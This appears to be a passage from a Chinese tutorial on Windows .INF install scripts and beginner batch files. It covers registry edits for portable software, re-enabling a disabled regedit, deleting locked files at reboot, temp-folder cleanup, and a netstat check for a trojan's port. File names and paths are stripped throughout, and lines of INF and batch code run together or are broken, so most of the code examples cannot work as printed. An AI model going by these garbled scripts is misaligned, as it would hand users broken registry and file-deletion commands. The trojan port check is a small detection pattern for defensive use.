EmEditor_文件中，把位于注册表路径

[HKEY_CURRENT_USERSoftwareEmSoftEmEditor v3]的内容存储到EmEditor_文

件中，把剩下的内容首先除掉COM组件的相关部分，然后存储到

EmEditor_文件中。

6.2 把EmEditor_文件和EmEditor_文件中涉及到路径的注册表内容

抽取出来，存储到文件。

6.3绿色软件的制作，其中核心的一点就是获得原来软件的安装程序所做出的注册表的

改变，然后把该变化导出为一个注册表文件.REG来进一步分析。如果导出的.REG文件不包括

绝对路径，那么可以把该注册表文件和提取出的软件打包在一起做成绿色软件。如果导出

的.REG文件中包含当前软件的绝对安装路径，那么就必须每次都要手工修改注册表中路径，

是很麻烦的，降低了做成绿色软件的意义所在。而使用.INF文件，使用AddReg命令可以轻松

容易的解决这个注册表路径的难题。

把EmEditor_文件和文件用INF的语法转换为INF文件，或者

用一个免费小工具自动转换，然后把转换得到的EmEditor_文件和

文件中的路径h:EmEditor4全部用%01%代替。下面是

文件的内容：

[Version]

Signature="$CHICAGO$"[DefaultInstall]

AddReg=EmEditorConf_AddReghklm,"SOFTWAREEmSoftEmEditor

v3Common","ModulePath",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigC++","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigCSS","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigHTML","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigJava","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3Configjavascript","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigJSP","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigPerl","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigPHP","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigPython","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigRuby","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigTeX","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigVBScript","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigVBScript for

EmEditor","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigWindows

Script","Tmpl",,"%01%"hkcu,"SoftwareEmSoftEmEditor

v3ConfigXML","Tmpl",,"%01%"6.4 写一个批处理文件，内容

如下：

regedit EmEditor_edit EmEditor_

,InstallHinfSection DefaultInstall 128 .svr32

,InstallHinfSection DefaultInstall

128 .EmEditor_6.5 把，，EmEditor_，

EmEditor_，EmEditor_5个文件存储到EmEditor的目录，删除其余的注册

表文件。

6.6 根据安装步骤和，写出相应的卸载的批处理文件，这个比较简单。

经过测试后，EmEditor工作正常，也可以注释掉的最后2行语句，这样

EmEditor就不会和系统关联，上面的步骤是在windows 2000上的，对于win9x也同样，而且

win9x下面的EmEditor的配置文件和windows 2000的一样，仅仅是程序的版本不同。

把制作好的绿色的EmEditor拷贝到U盘上，需要用的时候，直接执行里面的

文件就可以了（注意，要在EmEditor的目录运行批处理文件），不需要任何文件拷贝。

.INF文件是什么.INF是 Device Information File 的缩写，是微软公司为供硬件设备

制造商发布其设备驱动程序而发展的———许多硬件设备的驱动程序都是使用 .INF文件来

安装的。.INF文件从 Windows3.X 时代就开始大量被使用了。

.INF文件是一种具有特定格式的纯文本文件，我们可说它是一种安装脚本

（SetupScript）。虽然 .INF 只是纯文本文件，但是当我们在文件管理器explorer对 .INF

文件按鼠标右键後，如图inf右键.PNG，在右键菜单上就会出现“安装I”命令，这是因为微软

公司已在其操作系统 Windows 中内置提供了 Setup API（可以解释.INF脚本文件），我们只

需用文本编辑软件编写 .INF文件，便可完成大部份的安装工作，所以尤其是在软体的大小

并不是很大的情况下，安装工作不是很复杂的时候，使用 .INF文件来进行安装工作将会是

一个好选择。而且如果要安装设备驱动程序，.INF文件是目前唯一的选择。 可以用 .INF

文件创建包括注册表条目和目的目录的自定义软件安装指令。.INF文件可以提供有限的平台

独立性，并指定有限的软件依赖性。目前.INF文件最普遍的应用是为安装硬件设备的驱动程

序服务的，本文的目的就是介绍 .INF文件的功能、结构、并提供了几个 事例来说明如何

用.INF文件，如何扩展.INF文件的用途，比如制作绿色软件，仅供参考。

下面首先给出一个驱动程序的.INF文件的例子，如图，是我从

Windows2000中抽取出来的用于Win98se的USB存储设备驱动的文件，删除了大部

分内容，紧紧保留了一个基本的.INF文件的框架。

.INF文件的格式在图中，可以看到.INF文件是由许多节（Section）组成，

与.INI文件类似，整个.INF文件由几个节组成，节名用方括号扩起来，如version 节，

Manufacturer节，和Strings节等等。而每个节又由一系列的条目组成，每个条目都是是由

一个键（Key）与一个值（Value）组成，都是“Key=Value”这样的形式，在这些节中定义的

项目可以完成硬件的自动检测和软件（包括驱动程序）的安装。.INF文件中分号后面的字符

串是注释。在一个 .INF文件中，所有跟随在分号（;）后的文字都会被视为注释。注释并不

一定要在新行开始，可以在一行文字後面加入注释。

.INF文件案格式和作用如下所示：

[Version] 节： 包含对此 .INF文件的简短描述与此 .INF文件支持的设备类型的信息。

用于确认 .INF文件的基本版本信息。任何.INF文件都必须 包括这个节。

在图中，[Version] 节中的语句 Signature="$CHICAGO$"表明这个.INF

文件可以用于windows 95以后的所有平台上，目前来说就是win98，winme，winnt4，win2k，

winxp，win2k3。这种.INF文件比较多见。如果[Version]节中的签名条目是

Signature="$Windows 95$"，表明这个.INF文件可以用于windows 95以后的Win9x平台上，

目前来说就是win98，winme。 如果[Version]节中的签名条目是 Signature="$WINDOWS NT$"，

表明这个.INF文件可以用于WindowsNT系列的平台上，包括winnt4，win2k，winxp，win2k3。

WIN9x系列的操作系统的SetupAPI将会拒绝执行这种类型的.INF文件。

[Manufacturer] 与 [Manufacturer Name] 节： 列出此 .INF文件可辨识的所有硬件设

备，并列出了开发该硬件的厂商名称，主要用于硬件设备的安装。在设备驱动程序的.INF

文件中必须包括[Manufacturer]节与 [Manufacturer Name] 节。对应到图

中就是[Manufacturer]节和[Microsoft]节，安装新硬件的向导中列出来的厂商名字和设备

名称就是来自这两个节。这行语句“%MfgName%=Microsoft” 的等号右边的名字指明设备制造

商是Microsoft，等号左边是厂商的名字，图中的厂商名称是"Microsoft"（在后面讲到的

[Strings]节中）。在一个.INF文件中可以有多个设备制造商的名字，都必须放在

[Manufacturer]节中，同时[Manufacturer Name] 节可以列出该厂商的多种设备。

[Manufacturer Name] 节区含有对要安装的设备的描述，并为要安装的设备指出 [Install]

节区。 [Manufacturer Name]节语法：

[manufacturer-name]

device-description=install-section-name,device-id[,compatible-device-id]...

device-description就是对要安装的设备的描述。install-section-name就是此设备的

[Install] 节区名称，manufacturer-name 节区名称必须已在 [Manufacturer] 节区中被定

义。device-id是此设备的硬件标志符，每个厂家的不同的硬件对应着不同的设备标志符。

对应到图中，就是这行语句

“%Desc%=USBSTOR_BULK, USBClass_08&SubClass_02&Prot_50”等

号左边是设备的描述，也就是设备名字是"USB Mass Storage Device"，而等号右边的

USBClass_08&SubClass_02&Prot_50是设备标志符，这个标志符是对应到一类的硬件设备，

就是USB存储设备，操作系统检测到USB存储设备，安装相应的驱动的时候，就会从设备驱动

的安装节即[USBSTOR_BULK]节开始安装驱动。可以看出来此.INF文件可以用于通用的USB存

储设备"USB Mass Storage Device"的驱动程序的安装。

普通的安装软件的.INF文件中，不包括[Manufacturer] 与 [Manufacturer Name] 节，

即使包含，也不会执行它们，这2个节仅仅用于硬件的设备驱动中起作用。

[Install] 节： 描述设备驱动程序与硬件设备的实际属性。它也定义了所有 [Install]

节的名称，在此定义的节中包含了安装该设备的信息和命令。默认情况下，会执行

[DefaultInstall] 节，在图inf右键.PNG中，Install操作就会执行[DefaultInstall] 节。

[DefaultInstall] 节中包含指向其他节的指针，该节可用于指定要复制和删除的文件、注

册表的更新、.INF文件的更新等。

对应到图中，[Install] 节就是[USBSTOR_BULK]节，其中要执行复制文

件CopyFiles和添加注册表项目AddReg2种操作。

如果是安装普通的软件的.INF文件，可以通过鼠标右键菜单上的“安装”命令来安装（图

inf右键.PNG），这个时候.INF文件必须包括[DefaultInstall]节，也可以包括其他的

[Install]节，用 ,InstallHinfSection [Install]节的名字，

这样类似的命令来安装。

[Install]节的语法：

[install-section-name]

Copyfiles=file-list-section[,file-list-section]...

LogConfig=log-config-section-nameRenfiles=file-list-section[,file-list-section]

...

Delfiles=file-list-section[,file-list-section]...

UpdateInis=update-ini-section[,update-ini-section]...

UpdateIniFields=update-inifields-section[,update-inifields-section]...

AddReg=add-registry-section[,add-registry-section]...

DelReg=del-registry-section[,del-registry-section]...

Ini2Reg=ini-to-registry-section[,ini-to-registry-section]...

UpdateCfgSys=update-config-sectionUpdateAutoBat=update-autoexec-section[Install]

节定义了安装程式与硬体驱动需要的资源，以便安装新的驱动程式或者软件。此节中每个条

目都有其特定格式与意义，并非每个条目都是必要的。无论是安装驱动程序还是普通的软件，

最后都要从某一个[Install] 节开始执行。

[DestinationDirs] 节： 指定硬盘上复制、删除或重命名节文件的位置（例如 Windows

或 WindowsSystem）。 .INF文件通过[DestinationDirs]节来指定操作的目标路径，语法如

下：

[DestinationDirs]

file-list-section =ldid[, subdir ]

DefaultDestDir=ldid[, subdir ]

[DestinationDirs] 节定义了 [file-list-section] 节中指定的操作（可以是

CopyFiles、RenFiles 或 DelFiles 节）的目标目录。DefaultDestDir命令可以为 .INF文

件中的任何没有明确在[DestinationDirs]节中命名的CopyFiles、RenFiles或DelFiles节指

定默认目标文件夹。

在.INF文件中，使用逻辑磁盘标识符 (LDID) 来表示路径，如下表：

00 Null LDID - 可用于创建新的 LDID01 Source Drive:pathname10 Windows 文件夹

（等价于%windir%目录 ）11 System 文件夹12 IOSubsys 文件夹13 Command 文件夹17 Inf

文件夹18 Help 文件夹20 Fonts21 Viewers22 VMM3223 Color 文件夹24 包含 Windows 文

件夹的驱动器根目录28 Host Winboot30 启动盘的根文件夹31 虚拟启动盘的主驱动器根文

件夹如图中，这行语句“st = 10, system32drivers”表明

st这个文件列表中文件的目标路径是%windir%system32drivers，其中10

代表Windows所在的文件夹，也就是说st这个文件列表中文件

在安装驱动的时候将会被复制到%windir%system32drivers文件夹。而这个文

件将会被复制到17，也就是%windir%inf文件夹中。

[Strings] 节： 定义并列出上面所使用的可本地化字符串。如果某个特定的字符串会

在 .INF文件中频繁地出现，那么在此节中为它们定义一个字符串变量将会是个好选择。如

图中，语句MfgName="Microsoft"，定义了[Manufacturer]节使用的MfgName

变量（就是字符串"Microsoft"）。

[FileCopy/Delete/RenameSection(s)] 节：列出要复制、删除或重命名的文件。 节的

名字是CopyFiles，DelFiles，RenFiles。

[RegistryUpdateSection(s)] 节：指定在注册表中添加或删除的项目。 节的名字是

AddReg，DelReg。

[IniFileUpdateSection(s)] 节：指定 .ini 文件的更新。链接将在该节中创建。 节

的名字是 UpdateInis。

[ClassInstall] 节：为设备定义一个新的类别（Class）。主要用于硬件设备的安装。

[SourceDisksNames] 节： 列出包含文件的磁盘。

[SourceDisksFiles] 节： 列出每个文件所在的特定磁盘。

其他的节还有许多，如：Update .ini Fields 节 (UpdateIniFields)，Add Ini File to

Registry 节 (Ini2Reg)，Update 节 (UpdateCfgSys)，Update 节

(UpdateAutoBat)，Optional Components 节，等等。

.INF文件是由Windows的SetupAPI解释执行的脚本文件，它的运行过程很简单，是一种

线性的执行，线性的意思就是.INF文件的运行过程不存在分支语句，也就是没有条件语句，

一旦开始执行，就是沿着固定的路线运行。它的运行是按照节为单位来执行的，从某一个

[Install]节开始执行，从上到下执行该节中的条目，如果该条目是一个节，那么就一条条

执行子节中的条目，如此递归执行。

这样的脚本看起来功能很弱，但是对于简单的安装任务已经足够了，安装不外乎复制文

件，添加注册表，修改.INI文件等任务，这些都可以用.INF文件来完成。对于更复杂的安装

要求，如要求安装程序的界面漂亮方便，要求有选择性的安装，要求安装程序自动修复的功

能，就只好求助于其他的工具了，如微软的Windows Installer，就具备更加强大的功能。

.INF文件的版本.INF文件的语法是统一的分节语法，随着操作系统的更新，微软逐渐增

加了一些必要的关键字，但是整个的.INF文件的结构不会变化。从语法上来说，.INF文件都

是一个类别。

按照.INF文件的版本来分类，可以分为2类：

1 AdvancedINF，在[Version]节中有“AdvancedINF=2.5,"您需要新版本的

" ”这么一行语句，表明此.INF文件需要这个动态链接库来解释执

行，AdvancedINF有一些高级特性，但是在目前用的不太多。

2 普通INF，没有指明需要的.INF文件，使用来解释执行

（win9x系列的操作系统使用），系统中缺省使用的就是这种普通INF。

.INF文件的功能从前面的介绍，能够看出使用 .INF文件可以完成如下功能：

1 复制文件、删除文件、或重新命名文件。

2 新增或删除注册表（Registry）中的项目。

3 修改重要的系统设置文件（如 、、.INI 等）。

粗看起来，似乎上面提到的第一个功能可以用批处理文件.BAT来完成，第二个功能可以

通过注册表文件.REG来完成，第三个功能现在用得不多，不经常处理.INI文件了。这样说起

来似乎.INF文件也没有太大的优势啊。这种看法是有问题的，下面我将会着重指出.INF在在

这几个方面的应用，而不会仔细讲解.INF的语法。 下面要提到.INF文件优于别的工具的方

面。

用.INF文件编辑注册表.INF文件可以编辑操纵注册表，相应的的命令是AddReg和DelReg，

语法如下：

AddReg = add-registry-section[,add-registry-section]...

[ add-registry-section]

reg-root-string, [subkey], [value-name], [flag], [value]

[add-registry-section]节定义了将要添加的注册表子键或值名，可以有选择地设置它

的值。

DelReg = del-registry-section[,del-registry-section]...

[ del-registry-section]

reg-root-string, subkey, [value-name]

[ del-registry-section]节定义了将要从注册表中删除子键subkey或值名value-name。

有时候上网遇到某些网站，修改了IE的主页，然后禁用了REGEDIT工具，这个时候很多

人只好借助于其他第三方工具如魔法兔子等来恢复注册表的编辑权限，其实这个时候仅仅依

靠.INF文件就可以恢复使用REGEDIT工具的权限。

把下面的这段代码复制到记事本里，另存为,然后右击它选择“安装(I)”，就

可以了。

[Version]

Signature="$CHICAGO$"[DefaultInstall]

AddReg=[]

HKCU,"SOFTWAREMicrosoftwindowscurrentversionpoliciessystem","disableregist

rytools",

0x00010001,"0"HKLM,"SOFTWAREMicrosoftwindowscurrentversionpoliciessystem",

"disableregistrytools", 0x00010001,"0"当然还可以用其他的方法，原理也是一样的，这

里仅仅是演示一下.INF文件的用途。

直接使用注册表文件，有时候还会遇到另外一个缺点，就是.REG文件里面使用16进制代

码表示UNICODE字符串的，如下面的两条注册表语句：

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerUser

Shell Folders]

"Cookies"=hex(2):25,00,55,00,53,00,45,00,52,00,50,00,52,00,4f,00,46,00,49,00,4c

,00,45,00,25,00,5c,00,43,00,6f,00,6f,00,6b,00,69,00,65,00,73,00,00,00,00,00[HKE

Y_LOCAL_MACHINESYSTEMCurrentControlSetServicesSoftEther]

"ImagePath"=hex(2):22,00,44,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,

6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,53,00,6f,00,66,00,74,00,45,00,7

4,00,68,00,65,00,72,00,5c,00,53,00,6f,00,66,00,74,00,45,00,74,00,68,00,65,00,72

,00,2e,00,65,00,78,00,65,00,22,00,20,00,73,00,65,00,72,00,76,00,69,00,63,00,65,

00,00,00,00,00这上面两条语句难以阅读和修改，手工修改的话很麻烦，其中"Cookies"的

值实际上就是“%USERPROFILE%Cookies”字符串的UNICODE表示。

"ImagePath"的值实际上就是"D:Program " service

如果用.INF文件的形式的话，就很简单明白了:

[Version]

Signature="$CHICAGO$"[DefaultInstall]

AddReg=Folders_AddReg[Folders_AddReg]

HKCU,"SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell

Folders","Cookies",0x00020000,"%USERPROFILE%Cookies"HKLM,"SYSTEMCurrentContro

lSetServicesSoftEther","ImagePath",0x020000,"""D:Program

"" service"这个时候可以手工修改里面的路径信息，

而.REG文件则很难做到这一点。

用.INF文件编辑.INI文件.INF文件可以使用UpdateInis命令修改.INI文件的功能也经

常需要，UpdateInis的语法如下：

UpdateInis = update-ini-section[,update-ini-section]...

[ update-ini-section-name]

ini-file, ini-section, [old-ini-entry], [new-ini-entry], [flags]

[update-ini-section-name]节给出的 .INF 文件中替换、删除或添加的全部条目。

ini-file 包含要更改条目的 .ini 文件名。 ini-section 包含要更改条目的节名。

old-ini-entry 可选，常用形式为 Key=Value。new-ini-entry 可选，常用形式为 Key=Value。

flags 是可选操作标记。

使用逻辑磁盘标识符 (LDID)，可以方便的修改.INI文件中的路径信息，当然其他的条

目也同样。举例如下： Total Commander ，是一套极佳的文件管理员，内含各种压缩与解

压缩，类似NC般非常好用的工具，对于文件与路径的寻找，除一般的复制、删除、搬移、编

辑等功能外，还有FTP功能(具有续传、背景传输)与解决了中文乱码问题，"专题"再也不会

变成"彩题"、新增文件分割、文件合并、文件编码、文件解码(MIME，UUE，XXE)及新的操作

介面(浮动工具列)。真是一套相当强悍可完全取代文件总管的工具程序。

Total Commander依靠来配置相应的操作特性和功能，于是可以使用如下

的.INF文件修改中的路径信息：

[version]

Signature="$CHICAGO$"[DefaultInstall]

AddReg=AddGhisterUpdateInis=UpdateInicmd[AddGhister]

HKCU,"SoftwareGhislerTotal

Commander","IniFileName",0,"."HKCU,"SoftwareGhislerTotal

Commander","FtpIniName",0,".wcx_"[UpdateInicmd]

%01%, Configuration,,"InstallDir=%01%"%01%,

Configuration,,"Mainmenu=%01%"其中 [AddGhister]节负责修

改注册表中记录的的路径，而[UpdateInicmd]节负责修改文件红的相

应路径信息，可以看出，一个简单的.INF文件就完成了修改Total Commander的路径的任务，

在Total Commander5.x版本中，必须修改文件中的路径信息，这个时候使用.INF

文件是非常方便的。

用.INF文件删除正在使用的文件有时候由于某些文件正被操作系统使用而无法删除，如

某些用于资源管理器的OCX控件，可以使用.INF文件的DelFiles命令删除，该命令如果发现

要删除的文件被锁定，就会把文件放到系统删除队列中排队，等系统重启动的时候，该文件

就自动被删除了。

Delfiles的语法是：

Delfiles= file-list-section [,file-list-section]...

[file-list-section]

filename,,,1[file-list-section]节定义了将要删除的文件列表,filename后面的1是

一个标志，指明如果文件当前无法删除，就等到系统重启动后删除。把下面的这段代码复制

到记事本里，另存为,把这个文件拷贝到无法删除的文件的目录，然后右击它

选择“安装(I)”，就可以删除当前目录下正在使用的和。

[Version]

Signature="$Chicago$"[DestinationDirs]

DefaultDestDir = 01 ; 当前目录 ，定义了将要删除的文件的路径[DefaultInstall]

DelFiles = DELETELIST[DELETELIST]

,,,1; 将要删除的文件 ,,,1; 将要删除的文件同样可以使用

Copyfiles命令替换系统正在访问的文件。这些功能通过普通的del和copy命令都无法实现，

如果不使用.INF文件，必须使用第三方的软件来完成。

辅助制作绿色软件在注册表.REG文件中，不可以使用变量，这个缺陷对于需要设置路径

的安装程序来说，是非常致命的弱点，.REG文件中的路径都是静态的，一旦写好，就不会随

着系统的变化而变化，如果需要把安装的程序从C盘改变到D盘，而在.REG文件中记录了安装

路径的话，这个时候直接倒入注册表文件.REG是不行的，导入的注册表仍然是原来写入的路

径。而在.INF文件中，可以使用变量来操纵路径，从而可以跟踪安装程序所需要的路径的变

化。

对于绿色软件的制作，可以看我写的另外的专门的文章——绿色软件的制作，其中核心

的一点就是获得原来软件的安装程序所做出的注册表的改变，然后把该变化导出为一个注册

表文件.REG来进一步分析。如果导出的.REG文件不包括绝对路径，那么可以把该注册表文件

和提取出的软件打包在一起做成绿色软件。如果导出的.REG文件中包含当前软件的绝对安装

路径，那么就必须每次都要手工修改注册表中路径，是很麻烦的，降低了做成绿色软件的意

义所在。而使用.INF文件，使用AddReg命令可以轻松容易的解决这个注册表路径的难题。

对于绿色软件的安装制作来说，最重要的就是01，也就是源文件夹。下面举一个例子：

Registry Crawler V4.5 ，是强大的用户和开发者快速定位并配置注册表的工具软件。

一个强大的搜索引擎允许你基于搜索标准查找注册信息。（可以从天空软件站下载

/soft/），安装完成后导出的注册表包含着如下一条语句：

[HKEY_LOCAL_MACHINESOFTWARE4DevelopersRCrawlerAppPath]

@="F:toolsRegRCrawler"其中“F:toolsRegRCrawler”是安装路径。

而改写为.INF文件就是：

[version]

Signature="$CHICAGO$"[DefaultInstall]

AddReg=Add[Add]

HKLM,"SOFTWARE4DevelopersRCrawlerAppPath","",0,"%01%"注意里面的%01%就代

表当前的安装路径。

当我们把F:toolsRegRCrawler这个目录下的文件移动到其他目录时候，要用.REG文

件的方式的话，就必须手工修改注册表文件，而使用前面的.INF文件的时候，什么都无需修

改，只要在文件管理器explorer里面，用鼠标右键执行“安装”命令的时候，%01%就自动被替

换为当前所在的目录了。

最后，总结一句，注册表文件.REG非常方便和直观，但是对于处理路径的变化的情况，

非常笨拙和不方便，而.INF不如注册表文件直观，但是可以方便的处理路径信息（包括

UNICODE的路径信息），所以应该把.REG文件和.INF文件结合使用，互相弥补各自的缺点。

.INF文件的生成方法可以直接手工用一个纯文本的编辑器书写.INF文件，当相对应

的.REG文件非常庞大，条目比较多时候，可以用小工具来自动的把.REG文件转

换为.INF文件，然后再进行相应的路径修改，把绝对路径替换为用逻辑磁盘标识符 (LDID)

来表示的路径。

如果涉及到文件操作的时候，只好手工写了，目前还没有自动化的工具。

inf 文件的好处是 不像vbs那么强大，甚至有可能由危险的格式化代码inf的限制很强，

这样比其他的脚本文件安全,当然相对的功能就弱，但是也足够了以上谈到的都是我平时使

用.INF文件的经验和一点学习心得，欢迎大家提出不同意见和看法，进行讨论。

（十）bat批处理教程

这是一篇技术教程，我会用很简单的文字表达清楚自己的意思，你要你识字就能看懂，

就能学到知识。写这篇教程的目的，是让每一个看过这些文字的朋友记住一句话：如果爱可

以让事情变的更简单，那么就让它简单吧！看这篇教程的方法，就是慢！慢慢的，如同品一

个女人、一杯茗茶，你会发现很多以前就在眼前的东西突然变的很遥远，而有些很遥远的东

西却又突然回到了眼前。

先概述一下批处理是个什么东东。批处理的定义，至今我也没能给出一个合适的----

众多高手们也都没给出----反正我不知道----看了我也不一定信服----我是个菜鸟，当然就

更不用说了；但我想总结出一个“比较合适的”，而且我也相信自己可以把它解释的很清楚，

让更多的菜鸟都知道这是个什么东东，你用这个东东可以干什么事情。或许你会因为这篇文

章而“无条件爱上批处理”，那么我的目的就达到了----我就是要让你爱上它，我就这么拽，

你能怎么着？？真的，爱有时候就这么拽，就是这么没理由，就是这么不要脸！真的！

按照我的理解，批处理的本质，是一堆DOS命令按一定顺序排列而形成的集合。

OK,never claver and get to business（闲话少说言归正传）。批处理，也称为批处理

脚本，英文译为BATCH，批处理文件后缀BAT就取的前三个字母。它的构成没有固定格式，只

要遵守以下这条就ok了：每一行可视为一个命令，每个命令里可以含多条子命令，从第一行

开始执行，直到最后一行结束，它运行的平台是DOS。批处理有一个很鲜明的特点：使用方

便、灵活，功能强大，自动化程度高。我不想让自己写的教程枯燥无味，因为牵缠到代码（批

处理的内容算是代码吧？）的问题本来就是枯燥的，很少有人能面对满屏幕的代码而静下心

来。所以我会用很多简单实用的例子让读这篇教程的朋友去体会批处理的那四射的魅力，感

受它那古灵精怪的性格，不知不觉中爱上批处理（晕，怎么又是爱？到底批处理和爱有什么

关系？答案：没有！）。再说句“闲话”：要学好批处理，DOS基础一定要牢！当然脑子灵活也

是很重要的一方面。

例一、先给出一个最easy的批处理脚本让大家和它混个脸熟，将下面的几行命令保存为

然后执行（以后文中只给出代码，保存和执行方式类似）：

ping > g >> g >>

g >> g >> g

>> g >> g >>

t是不是都能看的懂？是不是很easy？但它的作用却是很实用的，执行这个批处理

后，可以在你的当前盘建立一个名为的文件，它里面记录的信息可以帮助你迅速找到

速度最快的QQ服务器，从而远离“从服务器中转”那一痛苦的过程。这里>的意思，是把前面

命令得到的东西放到后面所给的地方，>>的作用，和>的相同，区别是把结果追加到前一行

得出的结果的后面，具体的说是下一行，而前面一行命令得出的结果将保留，这样可以使这

个文件越来越大（想到如何搞破坏了？？）。By the way，这个批处理还可以和其他命

令结合，搞成完全自动化判断服务器速度的东东，执行后直接显示速度最快的服务器IP，是

不是很爽？后面还将详细介绍。

例二、再给出一个已经过时的例子（）：

@echo offif exist C:Progra~1TencentAD*.gif del

C:Progra~1TencentAD*.为什么说这是个过时的例子呢？很简单，因为现在已

经几乎没有人用带广告的QQ了（KAO，我的QQ还显示好友三围呢！！），所以它几乎用不上了。

但曾经它的作用是不可小窥的：删除QQ的广告，让对话框干干净净。这里用的地址是QQ的默

认安装地址，默认批处理文件名为，你当然可以根据情况自行修改。在这个脚本中使

用了if命令，使得它可以达到适时判断和删除广告图片的效果，你只需要不关闭命令执行后

的DOS窗口，不按CTRL+C强行终止命令，它就一直监视是否有广告图片（QQ也再不断查看自

己的广告是否被删除）。当然这个脚本占用你一点点内存，呵呵。

例三，使用批处理脚本查是否中冰河。脚本内容如下：

@echo offnetstat -a -n > e | find "7626" && echo "Congratulations!

You have infected GLACIER!"del se & exit这里利用了netstat命令，检查所有

的网络端口状态，只需要你清楚常见木马所使用的端口，就能很easy的判断出来是否被人种

了冰河。然这不是确定的，因为冰河默认的端口7626，完全可以被人修改。这里介绍的只是

方法和思路。这里介绍的是方法和思路稍做改动，就变成可以检查其他木马的脚本了，再改

动一下，加进去参数和端口及信息列表文件后，就变成自动检测所有木马的脚本了。呵呵，

是不是很过瘾？脚本中还利用了组合命令&&和管道命令|，后面将详细介绍。

例四，借批处理自动清除系统垃圾，脚本如下：

@echo offif exist c:windowstemp*.* del c:windowstemp*.*if exist

c:windowsTempor~1*.* del c:windowsTempor~1*.*if exist

c:windowsHistory*.* del c:windowsHistory*.*if exist c:windowsrecent*.*

del c:windowsrecent*.*将以上脚本内容保存到里，每次开机时就把系统

垃圾给自动删除了。这里需要注意两点：一、DOS不支持长文件名，所以就出现了Tempor~1

这个东东；二、可根据自己的实际情况进行改动，使其符合自己的要求。

怎么样，看到这里，你对批处理脚本是不是已经有点兴趣了？是不是发现自己已经慢慢

爱上了这个东东？别高兴的太早，爱不是一件简单的事，它也许能带给你快乐和幸福，当然

也能让你痛苦的想去跳楼。如果你知道很难还敢继续的话，I 服了 YOU！继续努力吧，也许

到最后你不一定得到真爱（真的有这可能，爱过的人都知道），但你可以体会到整个爱的过

程，就是如此。 酸、苦和辣，有没有甜天知道。

为什么会把批处理和爱情扯上关系？不是我无聊，也不是因为这样写有趣多少，原因有

二：其一，批处理和爱情有很多相同的地方，有些地方我用“专业”的行话解释不清（我不怀

疑自己的表达能力，而是事情本身就不好说清楚），说了=没说，但用地球人都知道的爱情一

比喻（爱情是什么？我**怎么知道！！），没准你心里一下就亮堂了，事半功倍，何乐而不为？

其二，我这段时间状态不是很好，感冒发烧头疼鼻塞，但主要还是感情上精神摧残，搞的人

烦透了，借写教程之际感慨几句，大家就全当买狗皮膏药了，完全可以省略不看（也许还真

有点效果----不至于让你看着看着就睡着了，把头磕了来找我报销医药费）。说不定下次的

教程中大家还会看到杨过、张无忌等金老前辈笔下的英雄们。

看过第一章的朋友，一定对批处理有了初步的印象，知道它到底是用来干什么的了。但

你知道运用批处理的精髓在哪里吗？其实很简单：思路要灵活！没有做不到的，只有想不到

的。这和爱情就有点不同了，因为爱情的世界是两个人的世界，一厢情愿不叫爱情（补充：

那叫单恋。废话！）而批处理却是一个人的天堂，你可以为所欲为，没有达不到的境界！

批处理看起来杂乱无章，但它的逻辑性之强，绝对不比其他程序语言（如汇编）低，如

果你写的脚本是一堆乱麻，虽然每一行命令都正确，但从头执行到尾后，不一定得到你想要

的结果，也许是一屏幕的Bad command or fail name。这又和爱情有了共同点：按步骤来经

营，缺少或增多的步骤都可能导致不想看见的结果。陷入爱河的朋友，相信没有不肯定这句

话的。我的爱情批处理，输出的结果不是Bad command or fail name，屏幕是这么显示的：

‘你的爱情’不是内部或外部命令，也不是可运行的程序或批处理文件。然后就是光标不停闪

动，等待这下一次错误的输入。

从这一章开始，将由浅入深的介绍批处理中常用的命令，很多常见DOS命令在批处理脚

本中有这广泛的应用，它们是批处理脚本的BODY部分，但批处理比DOS更灵活多样，更具备

自动化。要学好批处理，DOS一定要有比较扎实的基础。这里只讲述一些比较少用（相对来

说）的DOS命令，常用命令如COPY、DIR等就不做介绍了（这些看似简单的命令实际复杂的很，

我怕自己都说不清楚！）。

例五，先看一个实例。这是一个很有意思的脚本，一个小巧实用的好东东，把批处理“自

动化”的特点体现的淋漓尽致。先介绍一下这个脚本的来历：大家都知道汇编程序（MASM）

的上机过程，先要对源代码进行汇编、连接，然后再执行，而这中间有很多环节需要输入很

多东西，麻烦的很（只有经历过的朋友才懂得）。如何使这个过程变的简单呢？在我们搞汇

编课程设计时，我“被逼”写了这个脚本，用起来很爽，呵呵。看看脚本内容：

@echo off::close echocls::clean screenecho This programme is to make the MASM

programme automate::display infoecho Edit by CODERED::display infoecho Mailto me :

qqkiller***@::display infoif "%1"=="" goto usage::if input without

paramater goto usageif "%1"=="/?" goto usage::if paramater is "/?" goto usageif

"%1"=="help" goto usage::if paramater is "help" goto usagepause::pause to see

usagemasm %::assemble the .asm codeif errorlevel 1 pause & edit %::if

error pause to see error msg and edit the codelink % & %1::else link the .obj

file and execute the .exe file:usage::set usageecho Usage: This BAT file name [asm

file name]

echo Default BAT file name is ::display usage先不要被这一堆的东西给

吓怕了，静下心来仔细的看（回想一下第一章中第一段是怎么写的！！）。已经给出了每一行

命令的解释，两个冒号后面的内容为前一行内容解释的E文（害怕E文的朋友也不用担心，都

很easy，一看就懂了，实在不懂了不会查词典啊，这么懒？），在脚本执行时不显示，也不

起任何作用。倒数第5行行首有一个冒号，可不是笔误哦！具体作用后面会详细讲到。此脚

本中masm和link是汇编程序和连接程序，必须和edit程序以及你要编辑的源代码（当然还有

